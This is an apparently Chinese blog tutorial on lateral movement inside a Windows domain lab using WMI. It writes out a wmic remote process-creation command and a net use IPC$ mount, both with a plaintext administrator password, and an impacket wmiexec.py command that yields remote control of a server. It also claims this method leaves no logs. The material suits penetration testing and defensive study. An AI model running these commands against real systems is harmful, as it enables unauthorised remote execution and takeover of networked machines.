WMI(windows管理模块)横向渗透

微信扫一扫,分享到朋友圈

WMI(windows管理模块)横向渗透

自从PsExec被杀毒软件监控之后,黑客们又开始转移到WMI上,通过渗透测试发现,使用wmiexec进行横向移动时,windows操作系统竟然无动于衷,没有做任何日志记录。于是,越来越多的APT高级持续性威胁,开始了对WMI进行攻击研究~

1、使用WMI远程命令执行

  • win7域用户–> windows server 2012域用户(成功)
wmic /node:192.168.160.143 /user:HACKBIJI\Administrator /password:W2ngluoanquan process call create "cmd.exe /c ipconfig >c:\ip.txt"
  • 去windows server 2012域用户的C盘下,可以发现生成的 ip.txt 文件
  • 建立 IPC$ (win7域用户–> windows server 2012域用户)
net use \\192.168.160.143\ipc$ "W2ngluoanquan" /user:HACKBIJI\Administrator
  • 获取ip.txt文件信息 (windows server 2012域用户)
type \\192.168.160.143\c$\ip.txt

2、impacket工具包中的wmiexec

  • impacket的github官方地址
  • kali –> windows server 2012 (成功)
  • 获取远程windows系统的控制权
  • 不需要输入域信息
  • 进入impacket目录,先执行 pip install . 安装依赖
  • 然后就可以轻松拿到远程windows server 2012系统的控制权了
python wmiexec.py Administrator:W2ngluoanquan@192.168.160.143

本篇完~

微信扫一扫,分享到朋友圈

WMI(windows管理模块)横向渗透

实践 | kafka 基本使用

上一篇

看文章居然还能刷火箭?微信两大重磅新功能体验

下一篇

你也可能喜欢

WMI(windows管理模块)横向渗透

长按储存图像,分享给朋友